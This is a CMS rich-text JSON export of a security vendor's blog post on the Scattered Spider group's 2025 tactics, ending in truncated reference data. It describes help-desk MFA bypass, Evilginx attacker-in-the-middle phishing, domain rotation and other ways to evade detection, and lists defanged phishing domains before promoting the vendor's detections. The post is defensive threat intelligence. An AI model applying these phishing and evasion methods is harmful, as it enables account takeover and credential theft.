swapping",[104298],{"type":370},{},{"nodeType":178,"data":104301,"content":104302},{},[104303,104307,104316,104319,104327],{"nodeType":173,"value":104304,"marks":104305,"data":104306},"The public breaches associated with Scattered Spider have predominantly featured social engineering heavy initial access, mainly through help desk scams where the attacker contacts support personnel specifically to bypass MFA for accounts where they have acquired valid credentials via credential phishing or infostealers, but cannot access the account due the additional layer of protection. They have similarly used ",[],{},{"nodeType":186,"data":104308,"content":104310},{"uri":104309},"https://cloud.google.com/blog/topics/threat-intelligence/unc3944-sms-phishing-sim-swapping-ransomware/",[104311],{"nodeType":173,"value":104312,"marks":104313,"data":104315},"SIM swapping, smishing",[104314],{"type":194},{},{"nodeType":173,"value":933,"marks":104317,"data":104318},[],{},{"nodeType":186,"data":104320,"content":104321},{"uri":775},[104322],{"nodeType":173,"value":104323,"marks":104324,"data":104326},"MFA fatigue/push bombing",[104325],{"type":194},{},{"nodeType":173,"value":104328,"marks":104329,"data":104330}," to achieve account takeover.",[],{},{"nodeType":312,"data":104332,"content":104336},{"target":104333},{"sys":104334},{"id":104335,"type":317,"linkType":318},"2Z7qnaK4LXRhnQDvPT2ZXe",[],{"nodeType":235,"data":104338,"content":104339},{},[104340],{"nodeType":173,"value":104341,"marks":104342,"data":104344},"Impersonating and targeting SaaS services",[104343],{"type":370},{},{"nodeType":178,"data":104346,"content":104347},{},[104348,104352,104361],{"nodeType":173,"value":104349,"marks":104350,"data":104351},"Scattered Spider have also been known to ",[],{},{"nodeType":186,"data":104353,"content":104355},{"uri":104354},"https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications",[104356],{"nodeType":173,"value":104357,"marks":104358,"data":104360},"target SaaS applications and cloud services",[104359],{"type":194},{},{"nodeType":173,"value":104362,"marks":104363,"data":104364}," — both as part of their phishing strategies by impersonating app providers, as well as in their lateral movement and exploitation when an identity has been compromised. This has included applications such as vCenter, CyberArk, SalesForce, Azure, CrowdStrike, AWS, and GCP. ",[],{},{"nodeType":178,"data":104366,"content":104367},{},[104368],{"nodeType":173,"value":104369,"marks":104370,"data":104371},"When conducting phishing campaigns, they’ve created custom domains for their phishing sites based on the organizations they are targeting: ",[],{},{"nodeType":312,"data":104373,"content":104377},{"target":104374},{"sys":104375},{"id":104376,"type":317,"linkType":318},"3ufdtfyJpZ4FUWbKR2yNNm",[],{"nodeType":178,"data":104379,"content":104380},{},[104381],{"nodeType":173,"value":104382,"marks":104383,"data":104384},"And they have impersonated many software brands — either as targets themselves, or as convincing third-parties to lure their targets to interact with. ",[],{},{"nodeType":312,"data":104386,"content":104390},{"target":104387},{"sys":104388},{"id":104389,"type":317,"linkType":318},"XgrG1qKwXrpd399BwkHiR",[],{"nodeType":178,"data":104392,"content":104393},{},[104394,104398,104407],{"nodeType":173,"value":104395,"marks":104396,"data":104397},"(Shout out to the excellent analysis by the folks at ",[],{},{"nodeType":186,"data":104399,"content":104401},{"uri":104400},"https://www.silentpush.com/blog/scattered-spider-2025/#h-new-scattered-spider-ttps-for-2025",[104402],{"nodeType":173,"value":104403,"marks":104404,"data":104406},"Silent Push",[104405],{"type":194},{},{"nodeType":173,"value":60235,"marks":104408,"data":104409},[],{},{"nodeType":235,"data":104411,"content":104412},{},[104413],{"nodeType":173,"value":104414,"marks":104415,"data":104417},"Targeting identity providers to abuse OAuth and SSO",[104416],{"type":370},{},{"nodeType":178,"data":104419,"content":104420},{},[104421,104425,104432],{"nodeType":173,"value":104422,"marks":104423,"data":104424},"A key part of this approach is abusing OAuth by targeting identity providers (IdPs) such as Okta and Microsoft Entra. By compromising IdP accounts with administrator privileges, Scattered Spider has leveraged techniques such as ",[],{},{"nodeType":186,"data":104426,"content":104427},{"uri":989},[104428],{"nodeType":173,"value":992,"marks":104429,"data":104431},[104430],{"type":194},{},{"nodeType":173,"value":104433,"marks":104434,"data":104435}," to gain unrestricted access to the identities within the target IdP tenant (the equivalent of a full Active Directory compromise on-premise).",[],{},{"nodeType":235,"data":104437,"content":104438},{},[104439],{"nodeType":173,"value":104440,"marks":104441,"data":104443},"Encryption of cloud servers and data theft for extortion",[104442],{"type":370},{},{"nodeType":178,"data":104445,"content":104446},{},[104447],{"nodeType":173,"value":104448,"marks":104449,"data":104450},"When executing the final stages of an attack, Scattered Spider first exfiltrates data through a variety of methods, even using SaaS services such as DropBox and FiveTran to extract copies of high-value service databases, such as SalesForce and ZenDesk, using API connectors. ",[],{},{"nodeType":178,"data":104452,"content":104453},{},[104454],{"nodeType":173,"value":104455,"marks":104456,"data":104457},"In a typical \"double-extortion\" style, they then deploy ransomware by targeting cloud server environments such as VMWare ESXi (specifically to avoid security tools by targeting the hypervisor layer). Scattered Spider have been known to act as affiliates for various ransomware operations, including RansomHub, Qilin, and DragonForce.",[],{},{"nodeType":231,"data":104459,"content":104460},{},[],{"nodeType":169,"data":104462,"content":104463},{},[104464],{"nodeType":173,"value":104465,"marks":104466,"data":104468},"Scattered Spider TTP evolution in 2025",[104467],{"type":370},{},{"nodeType":178,"data":104470,"content":104471},{},[104472],{"nodeType":173,"value":104473,"marks":104474,"data":104475},"In 2025, security researchers have observed a significant increase in Scattered Spider phishing activity, particularly in the form of MFA-bypassing Attacker-in-the-Middle (AiTM) phishing pages. ",[],{},{"nodeType":312,"data":104477,"content":104481},{"target":104478},{"sys":104479},{"id":104480,"type":317,"linkType":318},"2jH5TrpHueIE8qpU3lunJi",[],{"nodeType":178,"data":104483,"content":104484},{},[104485],{"nodeType":173,"value":104486,"marks":104487,"data":104488},"Along with this shift, a number of TTPs have been observed relating to detection evasion measures implemented on these phishing pages.",[],{},{"nodeType":235,"data":104490,"content":104491},{},[104492],{"nodeType":173,"value":104493,"marks":104494,"data":104496},"Rapid phishing domain rotation",[104495],{"type":370},{},{"nodeType":178,"data":104498,"content":104499},{},[104500,104503,104511],{"nodeType":173,"value":37,"marks":104501,"data":104502},[],{},{"nodeType":186,"data":104504,"content":104505},{"uri":104400},[104506],{"nodeType":173,"value":104507,"marks":104508,"data":104510},"According to researchers",[104509],{"type":194},{},{"nodeType":173,"value":104512,"marks":104513,"data":104514}," Scattered Spider have been observed using phishing pages hosted on short-lived domains that included specific keywords such as “okta,” “sso,” “help,” “hr,” “corp,” “my,” “internal,” “sso,” or “vpn,”, which were quickly operationalized within minutes of registering a domain. After a couple of hours, the domain would often be taken down by the registrar. However, as we’ve discussed in various blog posts, this is to be expected. Domains are highly disposable by nature and attackers plan to get through them in large numbers. They don’t need their phishing pages to live indefinitely — just as long as it takes for someone to be successfully phished.",[],{},{"nodeType":178,"data":104516,"content":104517},{},[104518],{"nodeType":173,"value":104519,"marks":104520,"data":104521},"You would expect these kinds of untrusted links to be flagged by enterprise security tools, but through clever use of obfuscation methods such as using legitimate apps to host the phishing link, using an initially benign link to a document or other source with the malicious link, or avoiding email as the delivery vector altogether, network and email-based controls are being routinely bypassed.  ",[],{},{"nodeType":312,"data":104523,"content":104526},{"target":104524},{"sys":104525},{"id":98333,"type":317,"linkType":318},[],{"nodeType":235,"data":104528,"content":104529},{},[104530],{"nodeType":173,"value":104531,"marks":104532,"data":104534},"Using custom subdomains that allow public registrations",[104533],{"type":370},{},{"nodeType":178,"data":104536,"content":104537},{},[104538],{"nodeType":173,"value":104539,"marks":104540,"data":104541},"Scattered Spider have been observed registering their malicious domains on publicly rentable subdomains such as it[.]com. This limits the information that can be gathered about the domain (for example, preventing WHOIS information from being accessed) ",[],{},{"nodeType":178,"data":104543,"content":104544},{},[104545],{"nodeType":173,"value":104546,"marks":104547,"data":104548},"This is incredibly deceptive to the user and will fool many people glancing at the link. It doesn’t look as obviously suspicious as the typical .xyz or .biz, and has the feel of a legitimate domain. As these convincing rentable subdomains start to appear online more frequently, it becomes easier for attackers to pick up convincing domain names with fewer obvious deviations from the real one, without needing to resort to special characters or other tactics that might be spotted. ",[],{},{"nodeType":178,"data":104550,"content":104551},{},[104552,104556,104564,104568,104576],{"nodeType":173,"value":104553,"marks":104554,"data":104555},"This is strikingly similar ",[],{},{"nodeType":186,"data":104557,"content":104558},{"uri":14287},[104559],{"nodeType":173,"value":104560,"marks":104561,"data":104563},"to an attack we investigated recently",[104562],{"type":194},{},{"nodeType":173,"value":104565,"marks":104566,"data":104567},", where an attacker was using the us[.]com domain to impersonate Onfido, the digital identity platform. These malicious links were actually distributed via malicious advertising on Google, which is an increasingly popular tactic ",[],{},{"nodeType":186,"data":104569,"content":104570},{"uri":81553},[104571],{"nodeType":173,"value":104572,"marks":104573,"data":104575},"to evade email and network detection controls",[104574],{"type":194},{},{"nodeType":173,"value":104577,"marks":104578,"data":104579}," for phishing links and pages. ",[],{},{"nodeType":312,"data":104581,"content":104585},{"target":104582},{"sys":104583},{"id":104584,"type":317,"linkType":318},"34ZpjuFhaSMC6MtjThQsnK",[],{"nodeType":178,"data":104587,"content":104588},{},[104589],{"nodeType":173,"value":104590,"marks":104591,"data":104592},"This comparison is also interesting when you consider…",[],{},{"nodeType":235,"data":104594,"content":104595},{},[104596],{"nodeType":173,"value":104597,"marks":104598,"data":104600},"Using commercial AiTM toolkits like Evilginx to bypass MFA and evade detection",[104599],{"type":370},{},{"nodeType":178,"data":104602,"content":104603},{},[104604],{"nodeType":173,"value":104605,"marks":104606,"data":104607},"Scattered Spider have been observed frequently using Evilginx as their phishing kit of choice. Evilginx is a great choice for attackers looking to target non-standard web apps because it is capable of emulating a range of domains — it’s designed to be flexible and work for any page without generating a load of custom JavaScript that might stand out to security tools/analysts. See an example of Evilginx being used to phish a user below.",[],{},{"nodeType":312,"data":104609,"content":104612},{"target":104610},{"sys":104611},{"id":69626,"type":317,"linkType":318},[],{"nodeType":178,"data":104614,"content":104615},{},[104616,104620,104629,104633,104640],{"nodeType":173,"value":104617,"marks":104618,"data":104619},"By default, Evilginx redirects any site visitor not following the correct url path or supplying the correct parameters to the YouTube video for Rick Astley’s “Never Gonna Give You Up” (aka “Rickrolling”). This behavior has been observed on Scattered Spider phishing sites. Interestingly, we also observed this in the Onfido malvertising example above, ",[],{},{"nodeType":186,"data":104621,"content":104623},{"uri":104622},"https://www.linkedin.com/feed/update/urn:li:activity:7323102794813505536?commentUrn=urn%3Ali%3Acomment%3A%28activity%3A7323102794813505536%2C7323308731813814272%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287323308731813814272%2Curn%3Ali%3Aactivity%3A7323102794813505536%29",[104624],{"nodeType":173,"value":104625,"marks":104626,"data":104628},"while members of the infosec community",[104627],{"type":194},{},{"nodeType":173,"value":104630,"marks":104631,"data":104632}," are increasingly seeing phishing attacks with this behavior. (This example also features use of ",[],{},{"nodeType":186,"data":104634,"content":104635},{"uri":61655},[104636],{"nodeType":173,"value":8091,"marks":104637,"data":104639},[104638],{"type":194},{},{"nodeType":173,"value":104641,"marks":104642,"data":104643}," to prevent analysis of the malicious link by hiding it behind a legit Microsoft app consent page, another detection evasion tactic). ",[],{},{"nodeType":235,"data":104645,"content":104646},{},[104647],{"nodeType":173,"value":104648,"marks":104649,"data":104651},"Pre-populating victim information using targeted phishing links",[104650],{"type":370},{},{"nodeType":178,"data":104653,"content":104654},{},[104655,104659,104668],{"nodeType":173,"value":104656,"marks":104657,"data":104658},"A general trend that we’re seeing in the wild, also utilized by Scattered Spider, is phishing attacks becoming increasingly targeted. This includes using redirects to legitimate apps unless specific parameters are supplied, ",[],{},{"nodeType":186,"data":104660,"content":104662},{"uri":104661},"https://www.bleepingcomputer.com/news/security/phishing-kits-now-vet-victims-in-real-time-before-stealing-credentials/",[104663],{"nodeType":173,"value":104664,"marks":104665,"data":104667},"only loading malicious content for specific usernames",[104666],{"type":194},{},{"nodeType":173,"value":104669,"marks":104670,"data":104671}," (and redirecting to benign sites otherwise) implementing the use of one-time phishing links (essentially magic links that work once for the victim, preventing security teams or tools from accessing the page to analyse it later), and pre-populating the victim information on the page to make it feel more genuine (you would expect a website you have visited and logged into before to pre-populate some of your details, like your username/email). ",[],{},{"nodeType":178,"data":104673,"content":104674},{},[104675],{"nodeType":173,"value":104676,"marks":104677,"data":104678},"See an example of this (along with a few of the detection evasion techniques we've mentioned) below. ",[],{},{"nodeType":312,"data":104680,"content":104684},{"target":104681},{"sys":104682},{"id":104683,"type":317,"linkType":318},"1zn1G6CutY0HBkXHUIo159",[],{"nodeType":235,"data":104686,"content":104687},{},[104688],{"nodeType":173,"value":104689,"marks":104690,"data":104692},"Varying login pages to evade cloned page detections",[104691],{"type":370},{},{"nodeType":178,"data":104694,"content":104695},{},[104696,104700,104708],{"nodeType":173,"value":104697,"marks":104698,"data":104699},"Attackers are routinely using a ",[],{},{"nodeType":186,"data":104701,"content":104702},{"uri":97747},[104703],{"nodeType":173,"value":104704,"marks":104705,"data":104707},"combination of visual and DOM-based obfuscation techniques",[104706],{"type":194},{},{"nodeType":173,"value":104709,"marks":104710,"data":104711}," to create convincing phishing pages that are different enough from the real page being impersonated so that detections based on cloned pages do not fire. ",[],{},{"nodeType":178,"data":104713,"content":104714},{},[104715],{"nodeType":173,"value":104716,"marks":104717,"data":104718},"While Okta accounts remain a key target for Scattered Spider, they are using a range of customized landing pages to target Okta accounts for various organizations at URLs like:",[],{},{"nodeType":250,"data":104720,"content":104721},{},[104722,104732,104742,104752,104762,104772],{"nodeType":254,"data":104723,"content":104724},{},[104725],{"nodeType":178,"data":104726,"content":104727},{},[104728],{"nodeType":173,"value":104729,"marks":104730,"data":104731},"corp-hubspot[.]com – HubSpot",[],{},{"nodeType":254,"data":104733,"content":104734},{},[104735],{"nodeType":178,"data":104736,"content":104737},{},[104738],{"nodeType":173,"value":104739,"marks":104740,"data":104741},"morningstar-okta[.]com – Morningstar",[],{},{"nodeType":254,"data":104743,"content":104744},{},[104745],{"nodeType":178,"data":104746,"content":104747},{},[104748],{"nodeType":173,"value":104749,"marks":104750,"data":104751},"pure-okta[.]com – Pure Storage",[],{},{"nodeType":254,"data":104753,"content":104754},{},[104755],{"nodeType":178,"data":104756,"content":104757},{},[104758],{"nodeType":173,"value":104759,"marks":104760,"data":104761},"signin-nydig[.]com – New York Digital Investment Group",[],{},{"nodeType":254,"data":104763,"content":104764},{},[104765],{"nodeType":178,"data":104766,"content":104767},{},[104768],{"nodeType":173,"value":104769,"marks":104770,"data":104771},"sso-instacart[.]com – Instacart",[],{},{"nodeType":254,"data":104773,"content":104774},{},[104775],{"nodeType":178,"data":104776,"content":104777},{},[104778],{"nodeType":173,"value":104779,"marks":104780,"data":104781},"sts-vodafone[.]com – Vodafone",[],{},{"nodeType":312,"data":104783,"content":104787},{"target":104784},{"sys":104785},{"id":104786,"type":317,"linkType":318},"38EyQfvJWcqHukYq8rm8ap",[],{"nodeType":231,"data":104789,"content":104790},{},[],{"nodeType":169,"data":104792,"content":104793},{},[104794],{"nodeType":173,"value":104795,"marks":104796,"data":104798},"Defend your organization from Scattered Spider",[104797],{"type":370},{},{"nodeType":178,"data":104800,"content":104801},{},[104802],{"nodeType":173,"value":104803,"marks":104804,"data":104805},"Scattered Spider have proven to be a highly creative and adaptable threat group, using a range of identity-centric TTPs and evolving (or rather, adding to) their repertoire over time. ",[],{},{"nodeType":178,"data":104807,"content":104808},{},[104809],{"nodeType":173,"value":104810,"marks":104811,"data":104812},"Although Scattered Spider have a number of telltale actions and behaviors, like targeting and leveraging SaaS services, utilizing AiTM phishing kits like Evilginx to target IdP accounts like Okta, and deploying ransomware to cloud servers, they are able to flex their approach to take down their targets. ",[],{},{"nodeType":178,"data":104814,"content":104815},{},[104816,104820,104829,104833,104841],{"nodeType":173,"value":104817,"marks":104818,"data":104819},"Scattered Spider’s behavior demonstrates that they are extremely ",[],{},{"nodeType":186,"data":104821,"content":104823},{"uri":104822},"https://www.crowdstrike.com/en-us/resources/crowdcasts/cloud-threat-summit/",[104824],{"nodeType":173,"value":104825,"marks":104826,"data":104828},"cloud-conscious",[104827],{"type":194},{},{"nodeType":173,"value":104830,"marks":104831,"data":104832}," (as many modern threat actors are) and are leveraging modern TTPs designed to evade traditional security controls and exploit blind-spots in enterprise security visibility. For example, by constantly rotating their phishing domains and pages, Scattered Spider (and many threat actors like them) are routinely evading common phishing detection controls, taking advantage of the limitations of ",[],{},{"nodeType":186,"data":104834,"content":104835},{"uri":81553},[104836],{"nodeType":173,"value":104837,"marks":104838,"data":104840},"blocklist-driven approaches to phishing detection",[104839],{"type":194},{},{"nodeType":173,"value":197,"marks":104842,"data":104843},[],{},{"nodeType":231,"data":104845,"content":104846},{},[],{"nodeType":169,"data":104848,"content":104849},{},[104850],{"nodeType":173,"value":104851,"marks":104852,"data":104854},"Aligning Push Security’s capabilities against Scattered Spider’s TTPs",[104853],{"type":370},{},{"nodeType":178,"data":104856,"content":104857},{},[104858],{"nodeType":173,"value":104859,"marks":104860,"data":104862},"Push provides a multi-layered set of detections and controls for defending against the TTPs known to be used by Scattered Spider. ",[104861],{"type":370},{},{"nodeType":312,"data":104864,"content":104868},{"target":104865},{"sys":104866},{"id":104867,"type":317,"linkType":318},"6aB3mLLXZIhrlyuCx2hOzY",[],{"nodeType":235,"data":104870,"content":104871},{},[104872],{"nodeType":173,"value":104873,"marks":104874,"data":104875},"Detect and block AiTM phishing toolkits",[],{},{"nodeType":178,"data":104877,"content":104878},{},[104879],{"nodeType":173,"value":104880,"marks":104881,"data":104883},"The Push browser agent will detect when employees visit websites running MFA-bypassing phishing toolkits such as Evilginx. ",[104882],{"type":370},{},{"nodeType":312,"data":104885,"content":104889},{"target":104886},{"sys":104887},{"id":104888,"type":317,"linkType":318},"I19TQYItDFlaOgisrST6P",[],{"nodeType":178,"data":104891,"content":104892},{},[104893],{"nodeType":173,"value":104894,"marks":104895,"data":104896},"The Push browser agent analyzes the behavioral attributes of phishing tools, e.g. “something the toolkit does” vs. just a static signature like a URL path or domain.",[],{},{"nodeType":178,"data":104898,"content":104899},{},[104900],{"nodeType":173,"value":104901,"marks":104902,"data":104903},"Based on your configuration, Push can then warn or block employees from accessing those phishing sites using a customisable blocking page or banner.",[],{},{"nodeType":312,"data":104905,"content":104908},{"target":104906},{"sys":104907},{"id":98287,"type":317,"linkType":318},[],{"nodeType":235,"data":104910,"content":104911},{},[104912],{"nodeType":173,"value":104913,"marks":104914,"data":104915},"Detect cloned login pages",[],{},{"nodeType":178,"data":104917,"content":104918},{},[104919],{"nodeType":173,"value":104920,"marks":104921,"data":104923},"The Push browser agent will detect when employees visit websites using cloned login screens to steal credentials - i.e. a cloned Okta login page.",[104922],{"type":370},{},{"nodeType":178,"data":104925,"content":104926},{},[104927],{"nodeType":173,"value":104928,"marks":104929,"data":104930},"Push does this by fingerprinting the page structure and resources of your legitimate login pages and monitoring for pages that are very similar.",[],{},{"nodeType":178,"data":104932,"content":104933},{},[104934],{"nodeType":173,"value":104935,"marks":104936,"data":104937},"Push will then emit a webhook event when it detects that an employee has visited a page that appears to be a clone of a legitimate login page.",[],{},{"nodeType":235,"data":104939,"content":104940},{},[104941],{"nodeType":173,"value":104942,"marks":104943,"data":104944},"Pin your sensitive passwords to specific sites",[],{},{"nodeType":178,"data":104946,"content":104947},{},[104948,104953,104959],{"nodeType":173,"value":104949,"marks":104950,"data":104952},"The Push browser agent will detect when employees attempt to enter their IdP password (such as Okta) into webpages that ",[104951],{"type":370},{},{"nodeType":173,"value":104954,"marks":104955,"data":104958},"do not",[104956,104957],{"type":194},{"type":370},{},{"nodeType":173,"value":104960,"marks":104961,"data":104963}," belong to that IdP.",[104962],{"type":370},{},{"nodeType":178,"data":104965,"content":104966},{},[104967,104971,104979],{"nodeType":173,"value":104968,"marks":104969,"data":104970},"When observing logins, the Push browser agent generates a salted partial hash of the user’s password, known as a fingerprint. This fingerprint is then stored locally in the browser to allow Push to perform password comparisons. You can read more about how the extension securely observes passwords in this ",[],{},{"nodeType":186,"data":104972,"content":104974},{"uri":104973},"https://pushsecurity.com/help/10065/#start",[104975],{"nodeType":173,"value":21642,"marks":104976,"data":104978},[104977],{"type":194},{},{"nodeType":173,"value":1477,"marks":104980,"data":104981},[],{},{"nodeType":178,"data":104983,"content":104984},{},[104985],{"nodeType":173,"value":104986,"marks":104987,"data":104988},"To detect phishing attempts against Okta (and other identity providers), the Push browser agent compares the observed Okta password fingerprint to the known Okta fingerprint that already exists in local storage.",[],{},{"nodeType":178,"data":104990,"content":104991},{},[104992],{"nodeType":173,"value":104993,"marks":104994,"data":104995},"If an employee has entered their valid Okta password on a webpage that does not belong to Okta — i.e. a phishing page — Push will enforce the SSO password protection settings set by an administrator (block or warn). This serves as a second layer of defense when used in conjunction with AiTM and cloned login page detections. ",[],{},{"nodeType":312,"data":104997,"content":105001},{"target":104998},{"sys":104999},{"id":105000,"type":317,"linkType":318},"20FIoIyuQYxep3V4SFWdoK",[],{"nodeType":235,"data":105003,"content":105004},{},[105005],{"nodeType":173,"value":105006,"marks":105007,"data":105008},"Detect compromised sessions",[],{},{"nodeType":178,"data":105010,"content":105011},{},[105012],{"nodeType":173,"value":105013,"marks":105014,"data":105016},"By correlating Push telemetry with Okta logs, Push can detect compromised Okta sessions originating from outside employees’ supported browsers. ",[105015],{"type":370},{},{"nodeType":178,"data":105018,"content":105019},{},[105020],{"nodeType":173,"value":105021,"marks":105022,"data":105023},"Using the Push browser agent, you can inject a unique marker into the User Agent string of Okta sessions that occur in browsers enrolled in Push.",[],{},{"nodeType":178,"data":105025,"content":105026},{},[105027],{"nodeType":173,"value":105028,"marks":105029,"data":105030},"By then comparing against Okta logs, you can identify sessions that both have the Push marker and those that lack the marker, the latter indicating the session is being used from a machine without the Push extension and therefore the session token may have been stolen.",[],{},{"nodeType":312,"data":105032,"content":105036},{"target":105033},{"sys":105034},{"id":105035,"type":317,"linkType":318},"1XNNkaoW64t3PPvC54KGXF",[],{"nodeType":235,"data":105038,"content":105039},{},[105040],{"nodeType":173,"value":105041,"marks":105042,"data":105043},"Detect when employee credentials are stolen",[],{},{"nodeType":178,"data":105045,"content":105046},{},[105047],{"nodeType":173,"value":105048,"marks":105049,"data":105051},"Push will detect when valid credentials appear for sale on criminal forums. ",[105050],{"type":370},{},{"nodeType":178,"data":105053,"content":105054},{},[105055],{"nodeType":173,"value":105056,"marks":105057,"data":105058},"The Push platform detects valid, stolen credentials on criminal forums by ingesting threat intelligence data and then verifying which credentials flagged by TI sources are still being used by employees.",[],{},{"nodeType":178,"data":105060,"content":105061},{},[105062],{"nodeType":173,"value":105063,"marks":105064,"data":105065},"When suspected stolen credentials for the corporate domain are present, Push hashes and salts the passwords and then sends those fingerprints to the relevant browser agents for comparison. If the stolen credential fingerprint matches a known credential fingerprint observed to be in use by the Push browser agent, the platform returns a validated true positive alert.",[],{},{"nodeType":178,"data":105067,"content":105068},{},[105069],{"nodeType":173,"value":105070,"marks":105071,"data":105072},"You can choose to receive alerts for this detection via webhook, ChatOps notification, or in the Push admin console.",[],{},{"nodeType":312,"data":105074,"content":105078},{"target":105075},{"sys":105076},{"id":105077,"type":317,"linkType":318},"6wfLCTzvHeMzagyuEWGyJg",[],{"nodeType":235,"data":105080,"content":105081},{},[105082],{"nodeType":173,"value":105083,"marks":105084,"data":105085},"Map login methods and remove ghost logins",[],{},{"nodeType":178,"data":105087,"content":105088},{},[105089],{"nodeType":173,"value":105090,"marks":105091,"data":105093},"Push maps all the identities used by employees to access workforce apps, including local, non-Okta identities. This data can be used to migrate more apps and accounts to Okta SSO and reduce the overall identity attack surface. ",[105092],{"type":370},{},{"nodeType":178,"data":105095,"content":105096},{},[105097],{"nodeType":173,"value":105098,"marks":105099,"data":105100},"The Push browser agent observes employees using their corporate identities to access work applications. Push customers gain accurate visibility across all Okta and non-Okta identities, the employees that are using them, the apps they are accessing and the authentication methods being used. ",[],{},{"nodeType":178,"data":105102,"content":105103},{},[105104,105108,105115],{"nodeType":173,"value":105105,"marks":105106,"data":105107},"Armed with this data, security teams can get more workforce apps and accounts behind SSO to reduce the overall identity attack surface, while removing any ",[],{},{"nodeType":186,"data":105109,"content":105110},{"uri":4342},[105111],{"nodeType":173,"value":835,"marks":105112,"data":105114},[105113],{"type":194},{},{"nodeType":173,"value":105116,"marks":105117,"data":105118}," that enable attackers to circumvent MFA by logging in directly to the app/page. ",[],{},{"nodeType":312,"data":105120,"content":105124},{"target":105121},{"sys":105122},{"id":105123,"type":317,"linkType":318},"dbDM075qSd4P3wnXuXX2Z",[],{"nodeType":235,"data":105126,"content":105127},{},[105128],{"nodeType":173,"value":105129,"marks":105130,"data":105131},"Verify help desk caller identities with in-browser verification codes",[],{},{"nodeType":178,"data":105133,"content":105134},{},[105135,105138,105146],{"nodeType":173,"value":101248,"marks":105136,"data":105137},[],{},{"nodeType":186,"data":105139,"content":105140},{"uri":9152},[105141],{"nodeType":173,"value":101255,"marks":105142,"data":105145},[105143,105144],{"type":194},{"type":370},{},{"nodeType":173,"value":101261,"marks":105147,"data":105148},[],{},{"nodeType":312,"data":105150,"content":105153},{"target":105151},{"sys":105152},{"id":9179,"type":317,"linkType":318},[],{"nodeType":178,"data":105155,"content":105156},{},[105157],{"nodeType":173,"value":101273,"marks":105158,"data":105159},[],{},{"nodeType":178,"data":105161,"content":105162},{},[105163,105166,105173],{"nodeType":173,"value":101289,"marks":105164,"data":105165},[],{},{"nodeType":186,"data":105167,"content":105168},{"uri":101294},[105169],{"nodeType":173,"value":101297,"marks":105170,"data":105172},[105171],{"type":194},{},{"nodeType":173,"value":101302,"marks":105174,"data":105175},[],{},{"nodeType":312,"data":105177,"content":105180},{"target":105178},{"sys":105179},{"id":101326,"type":317,"linkType":318},[],{"nodeType":231,"data":105182,"content":105183},{},[],{"nodeType":169,"data":105185,"content":105186},{},[105187],{"nodeType":173,"value":18605,"marks":105188,"data":105190},[105189],{"type":370},{},{"nodeType":178,"data":105192,"content":105193},{},[105194],{"nodeType":173,"value":98309,"marks":105195,"data":105196},[],{},{"nodeType":178,"data":105198,"content":105199},{},[105200,105203,105209],{"nodeType":173,"value":61741,"marks":105201,"data":105202},[],{},{"nodeType":186,"data":105204,"content":105205},{"uri":98320},[105206],{"nodeType":173,"value":1472,"marks":105207,"data":105208},[],{},{"nodeType":173,"value":1477,"marks":105210,"data":105211},[],{},"How the notorious Scattered Spider cyber criminal group are switching up their TTPs in 2025 to bypass MFA and breach cloud services via account takeover.","2025-05-06T00:00:00.000Z",{"items":105215},[105216,105218],{"sys":105217,"name":505},{"id":504},{"sys":105219,"name":509},{"id":508},{"items":105221},[105222],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":105223},{"url":1496},{"items":105225},[105226],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":105227},{"url":1496},{"json":105229,"links":105763},{"nodeType":165,"data":105230,"content":105231},{},[105232,105237,105263,105339,105402,105408,105411,105417,105423,105429,105442,105448,105454,105457,105463,105469,105475,105505,105511,105532,105538,105541,105547,105553,105569,105646,105652,105657,105660,105666,105672,105678,105683,105700,105705,105711,105714,105720,105736,105752,105757],{"nodeType":312,"data":105233,"content":105236},{"target":105234},{"sys":105235},{"id":100724,"type":317,"linkType":318},[],{"nodeType":178,"data":105238,"content":105239},{},[105240,105243,105250,105253,105260],{"nodeType":173,"value":100730,"marks":105241,"data":105242},[],{},{"nodeType":186,"data":105244,"content":105245},{"uri":100735},[105246],{"nodeType":173,"value":100738,"marks":105247,"data":105249},[105248],{"type":194},{},{"nodeType":173,"value":933,"marks":105251,"data":105252},[],{},{"nodeType":186,"data":105254,"content":105255},{"uri":100747},[105256],{"nodeType":173,"value":100750,"marks":105257,"data":105259},[105258],{"type":194},{},{"nodeType":173,"value":100755,"marks":105261,"data":105262},[],{},{"nodeType":178,"data":105264,"content":105265},{},[105266,105269,105276,105279,105286,105289,105296,105299,105306,105309,105316,105319,105326,105329,105336],{"nodeType":173,"value":100762,"marks":105267,"data":105268},[],{},{"nodeType":186,"data":105270,"content":105271},{"uri":100767},[105272],{"nodeType":173,"value":100770,"marks":105273,"data":105275},[105274],{"type":194},{},{"nodeType":173,"value":2936,"marks":105277,"data":105278},[],{},{"nodeType":186,"data":105280,"content":105281},{"uri":100779},[105282],{"nodeType":173,"value":100782,"marks":105283,"data":105285},[105284],{"type":194},{},{"nodeType":173,"value":2936,"marks":105287,"data":105288},[],{},{"nodeType":186,"data":105290,"content":105291},{"uri":100791},[105292],{"nodeType":173,"value":100794,"marks":105293,"data":105295},[105294],{"type":194},{},{"nodeType":173,"value":2936,"marks":105297,"data":105298},[],{},{"nodeType":186,"data":105300,"content":105301},{"uri":100803},[105302],{"nodeType":173,"value":100806,"marks":105303,"data":105305},[105304],{"type":194},{},{"nodeType":173,"value":2936,"marks":105307,"data":105308},[],{},{"nodeType":186,"data":105310,"content":105311},{"uri":100815},[105312],{"nodeType":173,"value":100818,"marks":105313,"data":105315},[105314],{"type":194},{},{"nodeType":173,"value":2936,"marks":105317,"data":105318},[],{},{"nodeType":186,"data":105320,"content":105321},{"uri":100827},[105322],{"nodeType":173,"value":100830,"marks":105323,"data":105325},[105324],{"type":194},{},{"nodeType":173,"value":9534,"marks":105327,"data":105328},[],{},{"nodeType":186,"data":105330,"content":105331},{"uri":100839},[105332],{"nodeType":173,"value":100842,"marks":105333,"data":105335},[105334],{"type":194},{},{"nodeType":173,"value":100847,"marks":105337,"data":105338},[],{},{"nodeType":178,"data":105340,"content":105341},{},[105342,105345,105352,105355,105362,105365,105372,105375,105381,105384,105390,105393,105399],{"nodeType":173,"value":100854,"marks":105343,"data":105344},[],{},{"nodeType":186,"data":105346,"content":105347},{"uri":100859},[105348],{"nodeType":173,"value":100862,"marks":105349,"data":105351},[105350],{"type":194},{},{"nodeType":173,"value":2936,"marks":105353,"data":105354},[],{},{"nodeType":186,"data":105356,"content":105357},{"uri":100871},[105358],{"nodeType":173,"value":100874,"marks":105359,"data":105361},[10